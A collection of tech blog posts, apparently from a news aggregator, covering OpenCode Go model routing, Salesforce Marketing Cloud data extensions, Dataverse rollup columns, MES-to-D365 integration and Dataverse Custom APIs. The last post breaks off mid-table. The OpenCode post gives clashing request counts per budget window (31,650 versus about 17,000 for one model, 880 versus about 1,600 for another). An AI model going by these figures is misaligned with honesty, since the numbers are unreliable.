The article explains that OpenCode Go's usage limits are based on dollar amounts ($12 per 5-hour window) rather than request counts, making model routing critical because different models offer vastly different request volumes for the same cost. It highlights that DeepSeek V4 Flash provides approximately 36 times more requests than GLM-5.1 for the same $12 budget, and recommends assigning specific models to tasks based on complexity to optimize spending. The piece also describes Oh My OpenAgent's three-layer architecture (Planning, Orchestration, and Execution) and notes that multi-agent workflows can consume 30-50 requests per complex task, quickly exhausting the budget if expensive models are used unnecessarily.

Most guides on OpenCode Go start with the models. I want to start with the thing most guides get wrong: the limits are denominated in dollars, not requests.

That sounds like a minor distinction. It isn't.

## The thing everyone misses

OpenCode Go costs $5 for the first month, then $10/month. Your usage cap is $12 per 5-hour window, $30/week, $60/month.

When you spend $12 in a 5-hour window on DeepSeek V4 Flash, you get approximately 31,650 requests. When you spend the same $12 on GLM-5.1, you get around 880. Same budget. 36x difference in volume.

This is why routing actually matters. If you pick one model and use it for everything, you are either burning premium requests on tasks that don't need them, or you are under-using cheap models that are surprisingly capable. The right move is assigning models to tasks based on what each task actually requires.
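
As a quick check on that arithmetic, here is a minimal Python sketch that turns the two request counts quoted above into an effective cost per request. The function name and constants are illustrative only, and the counts are the approximate figures from this article, not values read from any API.

```python
WINDOW_BUDGET_USD = 12.00  # the 5-hour cap quoted above


def cost_per_request(requests_per_window: float, budget: float = WINDOW_BUDGET_USD) -> float:
    """Effective dollars per request if the whole window goes to one model."""
    return budget / requests_per_window


flash_cost = cost_per_request(31_650)  # DeepSeek V4 Flash, approximate count from the text
glm_cost = cost_per_request(880)       # GLM-5.1, approximate count from the text

# How many Flash requests fit in the budget of one GLM-5.1 request.
volume_ratio = glm_cost / flash_cost

print(f"Flash: ${flash_cost:.5f}/request, GLM-5.1: ${glm_cost:.5f}/request")
print(f"Ratio: {volume_ratio:.1f}x")
```

Thinking in cost per request rather than requests per window makes it easier to price a multi-agent task that mixes several models.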

MiniMax M2.5 has a hard cap of 100,000 requests per month regardless of cost. It activates only ~10B parameters and is priced at 16.7x cheaper than Claude Opus 4.6 on input tokens. For high-volume low-complexity work, it is the obvious choice, and most people don't know it exists.

## What you lose running on a single premium model

Say you put everything through DeepSeek V4 Pro: 10,200 requests per 5-hour window. That sounds fine for light use. But Oh My OpenAgent runs multiple agents in parallel. Prometheus decomposes your task, Metis synthesizes context, Atlas manages sequencing, Sisyphus runs execution, and the Librarian reads docs. A single complex task can fan out into 30-50 requests without you doing anything. Your 5-hour budget evaporates in a few hours of active work.

The problem isn't the quality gap. V4 Pro at 80.6% is within 7 percentage points of Claude Opus 4.7 at 87.6%, and for most routine tickets that gap is invisible. The problem is you don't need that quality for every step of a multi-agent workflow.

## The tier breakdown with actual numbers

Here is what the available models score on benchmarks that matter for coding tasks, plus the API pricing that drives the routing math:

| Model | SWE-Bench Verified | Input price (per M tokens) | Requests/5hrs ($12) | Context |
|---|---|---|---|---|
| Claude Opus 4.7 | 87.6% | $5.00 | ~480 | 200K tokens |
| DeepSeek V4 Pro | 80.6% | $0.435 (promo, ends May 31) | ~5,500 | 1M tokens |
| Kimi K2.6 | 80.2% | $0.95 | ~2,500 | 256K tokens |
| Claude Sonnet 4.6 | 79.6% | $3.00 | ~800 | 200K tokens |
| MiMo-V2.5-Pro | 78.9% | ~$0.40 | ~6,000 | — |
| Qwen3.6 Plus | 78.8% | $0.325 | ~7,400 | 1M tokens |
| DeepSeek V4 Flash | ~79.0% | $0.14 | ~17,000 | 1M tokens |
| GLM-5.1 | SWE-Bench Pro 58.4% | ~$1.50 | ~1,600 | 200K tokens |
| Qwen3.5 Plus | — | $0.08 | ~30,000 | — |
| MiniMax M2.5 | — | $0.03 | up to 100K/month | — |

*(Requests per 5-hour window calculated at roughly 2,500 average tokens per request.)*

Note: Kimi K2.6 original series was discontinued on May 25, 2026. The model itself stays available but the series is no longer receiving updates. DeepSeek V4 Pro's promotional pricing ($0.435/M) ends May 31 — after that the price increases, which changes the requests-per-window math.

Claude Opus 4.7 at 87.6% is genuinely the strongest model available for coding tasks right now, 7 points above V4 Pro. But at $5/M tokens, it costs 35x more than DeepSeek V4 Flash per token. Within the $12/5hr window, you get around 480 Opus 4.7 requests vs 17,000 Flash requests.

DeepSeek V4 Flash sits within about two points of V4 Pro in benchmark performance (~79.0% vs 80.6%) but at about 3x lower cost per token. For most routine coding tasks, that gap does not show up in practice. V4 Flash runs 284B total parameters with 13B active. V4 Pro runs 1.6T total with 49B active.

Kimi K2.6 is a 1-trillion-parameter MoE model with 32B active parameters, 80.2% SWE-Bench Verified. That puts it above Qwen3.6 Plus and close to V4 Pro, making it the right choice for genuinely hard multi-step reasoning when V4 Flash stalls.

GLM-5.1 sits at 744B total / 40B active. Its 200K context makes it suitable for deep planning tasks, and it handles the Oracle and Prometheus roles well at a mid-range cost point.

## How Oh My OpenAgent is structured

Oh My OpenAgent v4.2.3 (as of May 2026, with 48K+ GitHub stars) uses a 3-layer architecture:

**Planning Layer** handles strategic decomposition and knowledge synthesis. Two agents: Prometheus (breaks down what needs to happen) and Metis (synthesizes context and prior knowledge).

**Orchestration Layer** is Atlas. It maintains a todo-list, enforces sequencing, and tracks completion. It does not do the work itself. It manages what gets done in what order.

**Execution Layer** is where the work happens. Sisyphus is the default orchestrator with a 32K extended thinking budget. Nine or more specialized agents handle specific task types.

v4.0.0 introduced Team Mode, which activates 7 additional hooks (61 total vs 54 in standard mode). Team Mode is worth enabling if you are running parallel workstreams. It is off by default.

## The routing configuration

This is the community-recommended agent-to-model assignment. It is the result of a lot of trial and error, not theory:

| Agent | Primary Model | Fallback |
|---|---|---|
| Sisyphus | Kimi K2.6 | DeepSeek V4 Pro, then Qwen3.6 Plus |
| Hephaestus | DeepSeek V4 Pro | DeepSeek V4 Flash, then Kimi K2.6 |
| Oracle | GLM-5.1 | Kimi K2.6, then DeepSeek V4 Pro |
| Librarian | DeepSeek V4 Flash | Qwen3.5 Plus |
| Explore | DeepSeek V4 Flash | none |
| Prometheus | GLM-5.1 | Qwen3.6 Plus, then DeepSeek V4 Pro |
| Metis | Qwen3.6 Plus | DeepSeek V4 Pro |
| Atlas | DeepSeek V4 Pro | DeepSeek V4 Flash |
| Code-reviewer | Kimi K2.6 | DeepSeek V4 Pro |
| Multimodal-Looker | MiMo-V2.5-Pro | Qwen3.6 Plus |

Sisyphus gets Kimi K2.6 because it runs extended thinking at up to 32K tokens. You want the strongest reasoning model here, even at lower volume. Kimi's 256K context window handles long execution traces.

Librarian and Explore get V4 Flash. These agents read docs, fetch context, and do lookup work. They do not need frontier-level reasoning. Wasting V4 Pro on Librarian is the single most common budget mistake I see.

Oracle and Prometheus both get GLM-5.1. Planning and deep reasoning are where GLM-5.1 earns its slot. It is not the cheapest model, but it is not the most expensive either, and it performs well on the kinds of open-ended decomposition tasks these agents handle.

Hephaestus (the primary coding agent) gets V4 Pro as primary with V4 Flash as fallback. The gap between them is small enough that on simpler coding tasks, falling back to Flash costs you nothing visible.

MiMo-V2.5-Pro on Multimodal-Looker is deliberate. It scored 78.9% on SWE-Bench Verified and is specifically designed for agentic workflows.

## The routing decision rule

Route through V4 Flash first for any task that will exceed 100 requests. Escalate to Kimi K2.6 or V4 Pro only if V4 Flash gets stuck.

This works because V4 Flash at 79.0% SWE-Bench Verified handles the majority of real-world coding tasks correctly. The gap of under two points to V4 Pro is real but rarely shows up unless you are hitting genuinely hard tickets. When it does, the fallback chain handles it.

Do not escalate preemptively. Let the model fail first, then escalate. Preemptive escalation is how you burn through your window in an hour.
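
The "fail first, then escalate" rule can be sketched in a few lines of Python. This is an illustration of the idea, not how Oh My OpenAgent implements it: `run_with_escalation`, `fake_attempt`, and the chain order are hypothetical names and choices made for the example.

```python
from typing import Callable, Optional, Sequence


def run_with_escalation(
    task: str,
    chain: Sequence[str],
    attempt: Callable[[str, str], Optional[str]],
) -> tuple[str, str]:
    """Try each model in order; move on only after the previous one fails.

    `attempt(model, task)` is a hypothetical callback that returns a result
    string on success or None when the model gets stuck.
    """
    for model in chain:
        result = attempt(model, task)
        if result is not None:
            return model, result
    raise RuntimeError(f"all models in the chain failed for task: {task!r}")


# Cheapest model first, stronger models only as fallbacks.
CHAIN = ["deepseek-v4-flash", "kimi-k2.6", "deepseek-v4-pro"]


def fake_attempt(model: str, task: str) -> Optional[str]:
    # Stand-in for a real model call: pretend Flash stalls on "hard" tasks.
    if model == "deepseek-v4-flash" and "hard" in task:
        return None
    return f"{model} handled {task}"


print(run_with_escalation("routine ticket", CHAIN, fake_attempt)[0])
print(run_with_escalation("hard refactor", CHAIN, fake_attempt)[0])
```

The premium models are only ever billed for tasks the cheap model has already failed, which is the whole point of the rule.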

## What $10/month actually buys

At $60/month hard cap (the monthly ceiling), here is the math:

- ~5 active hours per day across 5 working days = 25 hours of active window time
- Each 5-hour window: $12 budget
- Routed correctly, a typical Oh My OpenAgent session on a medium-complexity feature might use 400-600 requests, weighted toward V4 Flash and Qwen3.5 Plus

In practice: you can run 8-12 substantial coding sessions per month before feeling the ceiling. For individual developer use, $10/month is genuinely enough. OpenCode hit 150K GitHub stars in May 2026 in part because that math works out.

The realistic comparison: Claude API at similar quality levels would cost $150-300/month for the same volume. That is where the 10-20x cost reduction claim comes from, and in my experience it holds.

## The honest trade-off

The gap between this stack and Claude Opus 4.7 on real-world bug fixes is about 7 percentage points. That is real. Some tickets require multiple iterations where Claude would have gotten it right once. Budget for that.

The 7-point gap is an average across all task types. On well-scoped tickets with clear acceptance criteria, the gap narrows significantly. The routing configuration is specifically designed to escalate to Kimi K2.6 or V4 Pro on the tasks where that gap is most likely to show up.

Where this stack genuinely struggles: ambiguous requirements, complex multi-file refactors with implicit dependencies, and tasks that require understanding undocumented system behavior. On those, premium models earn their cost. The routing configuration handles this by putting Kimi K2.6 on the hardest tasks, but Kimi has a 256K context window vs Qwen3.6 Plus's 1M, so very long context tasks may require a different allocation.

## The actual configuration

Two files control everything: `opencode.json` at your project root, and `.omc/config.json` for Oh My OpenAgent routing.

`opencode.json`

```
{
  "$schema": "https://opencode.ai/config.schema.json",
  "theme": "opencode",
  "autoshare": false,
  "model": "deepseek-v4-flash",
  "providers": {
    "opencode": {
      "models": [
        "deepseek-v4-pro",
        "deepseek-v4-flash",
        "kimi-k2.6",
        "glm-5.1",
        "qwen3.6-plus",
        "qwen3.5-plus",
        "mimo-v2.5-pro",
        "minimax-m2.5"
      ]
    }
  }
}
```

The `"model"` field sets your default. V4 Flash is the right default because it handles most tasks at lowest cost.

`.omc/config.json`

```
{
  "version": "4.2.3",
  "teamMode": false,
  "agents": {
    "sisyphus": {
      "model": "kimi-k2.6",
      "fallback": ["deepseek-v4-pro", "qwen3.6-plus"],
      "thinkingBudget": 32000
    },
    "hephaestus": {
      "model": "deepseek-v4-pro",
      "fallback": ["deepseek-v4-flash", "kimi-k2.6"]
    },
    "oracle": {
      "model": "glm-5.1",
      "fallback": ["kimi-k2.6", "deepseek-v4-pro"]
    },
    "prometheus": {
      "model": "glm-5.1",
      "fallback": ["qwen3.6-plus", "deepseek-v4-pro"]
    },
    "metis": {
      "model": "qwen3.6-plus",
      "fallback": ["deepseek-v4-pro"]
    },
    "atlas": {
      "model": "deepseek-v4-pro",
      "fallback": ["deepseek-v4-flash"]
    },
    "librarian": {
      "model": "deepseek-v4-flash",
      "fallback": ["qwen3.5-plus"]
    },
    "explore": {
      "model": "deepseek-v4-flash",
      "fallback": []
    },
    "code-reviewer": {
      "model": "kimi-k2.6",
      "fallback": ["deepseek-v4-pro"]
    },
    "multimodal-looker": {
      "model": "mimo-v2.5-pro",
      "fallback": ["qwen3.6-plus"]
    }
  },
  "routing": {
    "escalationPolicy": "on-failure",
    "budgetAlert": 10.00,
    "windowBudget": 12.00
  }
}
```

`escalationPolicy: "on-failure"` enforces the core rule: models escalate only when the primary fails, not preemptively. `budgetAlert` triggers a warning at $10 so you know you have $2 left in the window before the ceiling hits.
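
Because the two files are edited separately, it is easy to reference a model in `.omc/config.json` that is missing from the `opencode.json` provider list. The following is a small Python sketch of a consistency check, assuming the JSON layout shown above; `unlisted_models` is a hypothetical helper, and whether either tool performs this validation itself is not something this article confirms.

```python
def unlisted_models(opencode_cfg: dict, omc_cfg: dict) -> dict[str, list[str]]:
    """Map each agent to the models it references that no provider lists."""
    available = {
        model
        for provider in opencode_cfg.get("providers", {}).values()
        for model in provider.get("models", [])
    }
    problems: dict[str, list[str]] = {}
    for agent, settings in omc_cfg.get("agents", {}).items():
        wanted = [settings["model"], *settings.get("fallback", [])]
        missing = [m for m in wanted if m not in available]
        if missing:
            problems[agent] = missing
    return problems


# Trimmed-down example configs; real files would be loaded with json.load().
opencode_cfg = {"providers": {"opencode": {"models": ["deepseek-v4-flash", "qwen3.5-plus"]}}}
omc_cfg = {
    "agents": {
        "librarian": {"model": "deepseek-v4-flash", "fallback": ["qwen3.5-plus"]},
        "oracle": {"model": "glm-5.1", "fallback": ["kimi-k2.6"]},
    }
}

print(unlisted_models(opencode_cfg, omc_cfg))
```

An empty result means every primary and fallback model is declared in the provider list.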

## Quick start

```
# Install OpenCode Go
npm install -g opencode

# Install Oh My OpenAgent
npx omc install oh-my-openagent

# Create opencode.json and .omc/config.json from the templates above, then:
omc init --preset oh-my-openagent
# Check your current window spend
opencode usage --window current
```

Knowing where you are in the $12 window changes how aggressively you escalate to premium models.

For a deeper walkthrough of the original configuration approach, the guide that got me started is Jatin Malik's post: [OpenCode Go + Oh My OpenAgent: The Complete Guide to SOTA Model Routing Without Hitting Limits](https://medium.com/@jatinkrmalik/opencode-go-oh-my-openagent-the-complete-guide-to-sota-model-routing-without-hitting-limits-49fdc8cb3417)

---
## Seven Types of Data Extensions We Use on SFMC Projects

> Published: 2026-05-24 02:52:26+00:00
> Source: https://dev.to/sapotacorp/seven-types-of-data-extensions-we-use-on-sfmc-projects-83o
> wpnews: https://wpnews.pro/news/seven-types-of-data-extensions-we-use-on-sfmc-projects

The article summarizes seven types of Data Extensions (DEs) in Salesforce Marketing Cloud (SFMC), including Sendable DEs for email campaigns, Lookup DEs for reference data, Filtered DEs for point-and-click segmentation (which require manual refreshing), Random Split DEs for A/B testing, Shared DEs for cross-Business Unit access, Send Log DEs for tracking email sends, and DEs with Retention Policies for auto-purging old data. It emphasizes that understanding these distinctions—such as not using a Lookup DE for sending or forgetting to refresh a Filtered DE—prevents costly architecture mistakes. The article concludes that most projects use a mix of these types, and correctly identifying the DE type before creation saves significant time versus fixing errors later.

"Data Extension" is the generic term, but SFMC supports several DE types with different behaviors. Knowing the distinctions saves you from trying to send email from a lookup DE or forgetting to refresh a Filtered DE before a campaign.
Here's the reference we hand to every new engineer.
Sendable DE: the main type used for sending email. Requirements:
This is the DE you pick when you send a campaign or set up a Journey with Data Extension entry source. No send can happen without one.
Lookup DE: reference data that AMPscript Lookup() pulls into email templates at render time. Common examples:
Not sendable, no EmailAddress field needed. Used by the email, not as the source of the send.
Filtered DE: a DE created by applying a Data Filter to another DE - point-and-click segmentation without SQL. Example: "subscribers from Master_DE where MemberTier = Gold" produces a Gold-only Filtered DE.
Important: Filtered DEs need to be refreshed to reflect the current state of the source DE. They don't auto-update.
Refresh via:
If the source DE changes (new imports, updates) but the Filtered DE isn't refreshed, the Filtered DE holds stale data. Campaigns targeting it send to outdated segments.
For anything more complex than single-attribute filtering (joins, calculations), use SQL Query Activity writing to a standard DE, not a Filtered DE.
Random Split DE: splits a source DE into N equal random chunks. Use case: A/B/N testing where you need 10 equal groups to test 10 email variants.
No SQL needed. Configure the split percentages in the UI; SFMC assigns rows randomly.
Caveats:
Shared DE: a DE placed in the Shared Data Extensions folder in the parent Business Unit. Multiple child BUs in the Enterprise account can access the DE without copying it.
Use when:
Access permissions are set via Shared Data Extension Permissions - which BUs can read/write.
Watch for unintended cross-BU writes: if two BUs can write to the same Shared DE, coordinate schemas and import schedules.
Send Log DE: a special DE that logs every email send - who received what, when, subject line, etc. Useful for:
Created from the TriggeredSendDataExtension template when used with Triggered Sends.
Caveat: Test Sends don't write to Send Log. Only production sends do. If you're testing and expecting the Send Log to populate, it won't.
DE with Retention Policy: any DE can have a retention policy configured on creation:
Use for:
Set retention at creation if possible. Adding it later works but doesn't apply retroactively to existing rows until the next automation evaluation.

| Need | DE Type |
|---|---|
| Send email from this list | Sendable |
| Reference data AMPscript will look up | Lookup |
| Simple attribute-based segment | Filtered |
| A/B test random splits | Random |
| Cross-BU shared reference | Shared |
| Audit / custom tracking | Send Log |
| Auto-purge old data | DE with Retention Policy |

Most projects end up with a mix: one or two Sendable DEs, several Lookup DEs, possibly a Shared DE for multi-brand setups, and retention policies on anything transient.
Naming the DE type right in your head before creating it prevents architecture rebuilds. The decision takes seconds; fixing an incorrectly-typed DE after it's been loaded with data can take a day.

---
## Rollup vs calculated columns in Dataverse: the async trap we fell for

> Published: 2026-05-24 02:52:20+00:00
> Source: https://dev.to/sapotacorp/rollup-vs-calculated-columns-in-dataverse-the-async-trap-we-fell-for-1mh1
> wpnews: https://wpnews.pro/news/rollup-vs-calculated-columns-in-dataverse-the-async-trap-we-fell-for

The article explains the critical difference between calculated and rollup columns in Dataverse, highlighting that rollup columns update on a configurable schedule (default every 12 hours, minimum every hour), while calculated columns compute values in real-time when a row is read. The authors describe a real-world scenario where a team mistakenly assumed a rollup column provided real-time totals, leading to stale data on a deal dashboard. They then present three alternatives for achieving current aggregate data: using a plugin to update totals on child record changes, employing a calculated column on child records for read-time aggregation, or adding a manual refresh button to trigger rollup recalculation.

A deal desk dashboard showed the running total of opportunities per account. Total amount per account was a rollup column. Users opened the dashboard, saw a total, made a decision. Then someone added a new opportunity and checked the same account. The account's total did not change.
Fifteen minutes later, refresh - still not changed. An hour later - changed. The rollup column was working exactly as documented, and the team had mistaken it for a real-time aggregate.
Here is the difference between calculated and rollup columns, and the pattern we now use when the dashboard needs to be current.
Calculated column: computes its value every time the row is read. If the column adds two other columns, every time anything loads the row (form view, API call, view row), Dataverse computes the sum. Results are always current because they are re-derived on demand.
Rollup column: computes its value on a schedule. The default schedule is every 12 hours, configurable down to one hour per column. A rollup that sums child record amounts reads the current state of children when the schedule fires, stores the result, and serves that stored value until the next schedule.
Both store their definition (the formula) in the solution. Both look identical to consuming code. The runtime behavior is radically different.
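
The difference in runtime behavior can be illustrated with a toy Python model. This is not Dataverse code: the class, the column names (`base_fee`, `discount`), and `run_scheduled_refresh` are all hypothetical stand-ins for the two evaluation strategies described above.

```python
class AccountRow:
    """Toy model of one parent row with both kinds of derived column."""

    def __init__(self, base_fee: float, discount: float) -> None:
        self.base_fee = base_fee
        self.discount = discount
        self.child_amounts: list[float] = []
        self._stored_rollup = 0.0  # only changes when the schedule fires

    @property
    def net_fee(self) -> float:
        # Calculated-style: derived from same-row columns on every read.
        return self.base_fee - self.discount

    @property
    def total_opportunities(self) -> float:
        # Rollup-style: serve the value stored by the last refresh.
        return self._stored_rollup

    def run_scheduled_refresh(self) -> None:
        # Stand-in for the scheduled rollup job.
        self._stored_rollup = sum(self.child_amounts)


row = AccountRow(base_fee=100.0, discount=10.0)
row.discount = 25.0
row.child_amounts.append(5000.0)

print(row.net_fee)              # reflects the new discount immediately
print(row.total_opportunities)  # still the old stored value
row.run_scheduled_refresh()
print(row.total_opportunities)  # now includes the new child
```

Both properties look the same to a caller, which is exactly why the stale rollup surprises people.
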
Calculated columns are correct when:
Rollup columns are correct when:
A calculated column that aggregates children is not allowed. Dataverse blocks it for performance reasons: reading an account would trigger a query across all its opportunities on every load. Rollup is the platform's answer: compute the aggregate ahead of time, serve it cached.
The request for a running total of child records usually comes from a business user who sees the number on a dashboard and expects it to match reality. When a user tells the team "the total on the Account form should show all linked Opportunity amounts," the team builds a rollup column. The dashboard shows the rollup.
The user then creates an opportunity, looks at the account, and the total is stale. From the user's perspective, the number is wrong. From the platform's perspective, the number is accurate for the last time the schedule fired.
The fix is either to lower the user's expectations (the dashboard updates on a schedule) or to change the implementation.
When the aggregate genuinely needs to be current:
Alternative 1: plugin that updates a stored total on every child change.
A post-operation plugin on Opportunity (Create, Update on amount, Delete) recalculates acme_total_opportunities on the parent Account and writes it. Works for modest volumes - an account with 200 opportunities, each updating rarely, is fine. Fails for accounts with 20,000 opportunities updating frequently - every child change becomes a parent write, and the Dataverse execution pipeline starts throttling.
Good for: master-detail relationships with medium fanout.
Alternative 2: calculated column summing via the lookup.
You cannot aggregate children from a parent via a calculated column, but you can compute the child's contribution per row using a calculated column on the child. acme_attributable_amount = IF(acme_is_counted, amount, 0) on Opportunity, then use that in any consumer query. The consumer does the aggregation at read time.
Works for: dashboards that can run FetchXML with aggregate operators (SUM the acme_attributable_amount across children in a single query). Fails if the consumer is a Dataverse form or view that cannot run aggregate queries.
Good for: Power BI reports, custom dashboards, anywhere you control the read query.
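
For Alternative 2, the read-time aggregation might look like the FetchXML built by this Python sketch. It assumes the `acme_attributable_amount` column from the example above is usable in aggregate queries, that opportunities link to the account through the `parentaccountid` lookup, and that `total_amount` is an acceptable alias; `build_total_query` is a hypothetical helper, and sending the query to Dataverse is left out.

```python
import xml.etree.ElementTree as ET


def build_total_query(account_id: str) -> str:
    """Build a FetchXML aggregate query summing one account's opportunities."""
    fetch = ET.Element("fetch", {"aggregate": "true"})
    entity = ET.SubElement(fetch, "entity", {"name": "opportunity"})
    # SUM over the per-row calculated contribution.
    ET.SubElement(
        entity,
        "attribute",
        {"name": "acme_attributable_amount", "alias": "total_amount", "aggregate": "sum"},
    )
    # Restrict the aggregate to children of a single account.
    flt = ET.SubElement(entity, "filter")
    ET.SubElement(
        flt,
        "condition",
        {"attribute": "parentaccountid", "operator": "eq", "value": account_id},
    )
    return ET.tostring(fetch, encoding="unicode")


query = build_total_query("00000000-0000-0000-0000-000000000001")
print(query)
```

The aggregation cost moves to the consumer, which is why this only suits readers that control their own query.
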
Alternative 3: rollup with one-hour schedule plus "Refresh" button.
Keep the rollup for the baseline case. Add a button on the form that explicitly triggers a rollup recalculation via the CalculateRollupField SDK request. User experiences it as "I just added a child, now I hit Refresh, the total updates."
Works for: dashboards with bursty usage patterns - the baseline is acceptable, explicit refresh covers the "just changed it" case.
Good for: sales management screens, deal desk reviews, scenarios where users understand the refresh semantics.
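
The Refresh button in Alternative 3 ultimately has to issue the recalculation request. Over the Web API, the same operation is exposed as the `CalculateRollupField` function; the Python sketch below only builds the request URL. The helper name, the `v9.2` version segment, and the example organization URL are assumptions, and authentication plus the actual GET call are omitted.

```python
from urllib.parse import quote


def rollup_refresh_url(org_url: str, entity_set: str, row_id: str, column: str) -> str:
    """Build the GET URL that asks Dataverse to recalculate one rollup column."""
    # Parameter aliases keep the function call readable; values go in the query string.
    target = "{'@odata.id':'%s(%s)'}" % (entity_set, row_id)
    field = "'%s'" % column
    return (
        f"{org_url.rstrip('/')}/api/data/v9.2/"
        "CalculateRollupField(Target=@target,FieldName=@field)"
        f"?@target={quote(target, safe='')}&@field={quote(field, safe='')}"
    )


example_url = rollup_refresh_url(
    "https://example.crm.dynamics.com/",  # placeholder organization URL
    "accounts",
    "00000000-0000-0000-0000-000000000001",
    "acme_total_opportunities",
)
print(example_url)
```

A form button handler would send this request with the user's token and then reload the field.
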
On any project with more than three rollup columns, we audit quarterly:
The audit takes 20 minutes per project. Half the time, at least one rollup can be deleted; a third of the time, at least one schedule needs adjusting.
A rollup of child-record amounts updates when a child is created or its amount changes. It does not update when a child is deleted, until the scheduled refresh fires.
The window between "child deleted" and "rollup refreshed" shows an overstated total. This is especially painful in audit scenarios - a user deletes a duplicate, the total still shows the duplicate's contribution for up to twelve hours.
The fix is either a plugin on the child Delete event (post-operation, trigger a rollup recalculation explicitly via CalculateRollupFieldRequest) or a tighter schedule. We usually go with the plugin when the table supports deletions, because the time-lag is user-visible.
Rollup columns ship with a form tooltip: "This total refreshes every N hours. Click Refresh after adding new records to see updated totals immediately."
The tooltip is one field-description line. It costs nothing to add, and it heads off the "why is the number stale" ticket that would otherwise land every other week. Every rollup we ship has it. Every one we inherit gets it added on the first pass.

---
## MES integration with D365 Supply Chain: Azure middleware pattern

> Published: 2026-05-24 02:52:14+00:00
> Source: https://dev.to/sapotacorp/mes-integration-with-d365-supply-chain-azure-middleware-pattern-4698
> wpnews: https://wpnews.pro/news/mes-integration-with-d365-supply-chain-azure-middleware-pattern

The article explains that integrating a Manufacturing Execution System (MES) with Dynamics 365 Supply Chain Management requires low-latency, high-throughput, and reliable data flow, which cannot be achieved by batch jobs, OData polling, or direct database triggers due to their documented failure modes. The recommended solution is an Azure middleware pattern using Service Bus for guaranteed messaging, Logic Apps for orchestration, and F&O Business Events for bidirectional, real-time synchronization. This architecture ensures traceability and scalability by maintaining data correlation and supporting high event volumes without lost messages.

Manufacturers running Dynamics 365 Supply Chain Management almost always also run a dedicated Manufacturing Execution System (MES) on the shop floor. Production order updates, inventory movements, quality tests, and traceability data flow between them continuously. The integration has to be low-latency (shop floor runs on seconds, not hours), high-throughput (hundreds of events per minute at peak), and reliable (lost messages mean lost traceability).
Three integration patterns come up in evaluations. Two have documented failure modes.
Nightly batch jobs via Data Management Framework. Designed for bulk data movement, not real-time signaling. Production orders complete hours before D365 knows about them. The real-time inventory view always lags. Traceability data arrives after the batches have shipped.
Custom OData polling with a loop that queries MES every few seconds. Introduces polling overhead for no latency benefit, and MES systems aren't typically designed to handle heavy poll loads. Also creates a custom code dependency that needs maintenance.
Database-level triggers on the MES database pushing directly to F&O's database. Breaks supportability completely. D365 F&O is a managed platform - direct database writes aren't supported, aren't upgrade-safe, and will break the next time Microsoft changes schema. Also creates a security nightmare (MES has privileged write access to F&O's database?).
The only answer that fits the requirements is Azure middleware between the two systems.
Logic Apps or Service Bus as middleware between MES and D365, with F&O Business Events on the D365 side.
What each piece does:
Azure Service Bus for the guaranteed-delivery, ordered messaging. Production-order status updates, inventory moves, quality-test results flow through Service Bus queues with FIFO ordering per production order.
Azure Logic Apps for the orchestration where branching and transformation happen. A pick-complete event from MES fires a Logic App that transforms the payload, updates inventory in D365, and triggers the next production-flow message back to MES.
F&O Business Events for the D365-side publishing. When a production order is created, released, or completed in F&O, a business event fires to Service Bus or Event Grid. MES subscribers pick it up.
Custom Services on F&O for the inbound - when MES has a state change D365 needs to record, the Logic App (or Function) calls a custom service endpoint on F&O. Custom services are designed for low-latency targeted writes, unlike data entities which are bulk-optimized.
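
The "FIFO ordering per production order" requirement can be pictured with a small in-memory Python model. It is only a stand-in: in Azure Service Bus this kind of grouping is typically achieved with message sessions keyed by a session ID, and the class and field names below are hypothetical.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ShopFloorEvent:
    production_order: str  # ordering key; plays the role of a session ID
    status: str


class PerOrderFifo:
    """In-memory stand-in for a queue that keeps FIFO order per production order."""

    def __init__(self) -> None:
        self._lanes: dict[str, deque] = defaultdict(deque)

    def send(self, event: ShopFloorEvent) -> None:
        self._lanes[event.production_order].append(event)

    def receive(self, production_order: str) -> Optional[ShopFloorEvent]:
        lane = self._lanes[production_order]
        return lane.popleft() if lane else None


queue = PerOrderFifo()
for order, status in [
    ("PO-1", "released"),
    ("PO-2", "released"),
    ("PO-1", "started"),
    ("PO-1", "completed"),
]:
    queue.send(ShopFloorEvent(order, status))

# Events for PO-1 come back in the order they were sent, regardless of PO-2 traffic.
po1_statuses = [queue.receive("PO-1").status for _ in range(3)]
print(po1_statuses)
```

Ordering is only guaranteed within one production order, which lets different orders be processed in parallel.
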
Traceability is specific in manufacturing - regulators and customers need to know which raw materials went into which finished-goods batch. D365's batch tracking combines with MES's shop-floor batch recording to produce the full lineage. The integration ensures:
The integration isn't just about moving data - it's about keeping the correlation intact under all failure modes.
At manufacturing scale (large plants with multiple lines, each firing events per minute), throughput planning matters:
Manufacturing can't afford lost messages. The architecture carries:
Flows in each direction have different shapes:
MES → D365 (updates ERP from shop floor):
D365 → MES (issues work to shop floor):
Bidirectional correlation:
Not everything is Logic Apps. Sometimes:
Each has a clear use case. Reach for them when the declarative tool hits a limit, not as default.
A working MES-to-D365 integration has:
The pattern is architect-grade because manufacturing systems won't tolerate the simpler options. Azure middleware is the supported, scalable, maintainable middle.

---
## Custom API vs Custom Action vs Azure Function: Dataverse decision

> Published: 2026-05-24 02:52:09+00:00
> Source: https://dev.to/sapotacorp/custom-api-vs-custom-action-vs-azure-function-dataverse-decision-2lo4
> wpnews: https://wpnews.pro/news/custom-api-vs-custom-action-vs-azure-function-dataverse-decision

The article compares three methods for implementing business logic in Microsoft Dataverse—Custom Actions (legacy), Custom APIs (modern), and Azure Functions—focusing on their latency, cost, concurrency, and maintenance profiles. Custom APIs are recommended for most new Dataverse-heavy operations due to their low latency, inclusion in existing licensing, and first-class integration with Power Automate, while Azure Functions are better suited for long-running or external-dependency-heavy work despite higher latency and separate compute costs. The author provides a decision matrix and practical guidance, including a case study where a Custom API was chosen over Azure Functions for a loyalty rebate calculation triggered on order creation.

A client needs to expose a "calculate the loyalty rebate for this customer" operation. It reads three Dataverse tables, applies some business rules, writes a result. Every consumer - the Dynamics web app, a Power Automate flow, an external integration - should call the same operation.
Three places we could put it. Three different cost, latency, and scale profiles. Here is the matrix we now run on every "new operation" request.
Custom Action (legacy): a process defined in Dataverse that can be invoked through the SDK. Steps are Workflow Activity Actions. Old-school but still widely deployed.
Custom API (modern): the successor to custom actions. Defined as Dataverse entity rows (customapi, customapiRequestParameter, customapiResponseProperty), backed by a plugin that implements the logic. Exposed through the Web API with a typed OpenAPI schema.
Azure Function: fully external .NET function, invoked from Power Automate or direct HTTP. Runs in its own compute, scales separately, has its own pricing.
The three solve overlapping problems. The choice is about latency, cost structure, and who maintains the code.

| Dimension | Custom Action | Custom API | Azure Function |
|---|---|---|---|
| Latency | Low (in-process) | Low (in-process) | Medium (cross-service) |
| Concurrency limit | Dataverse's | Dataverse's | Function App's |
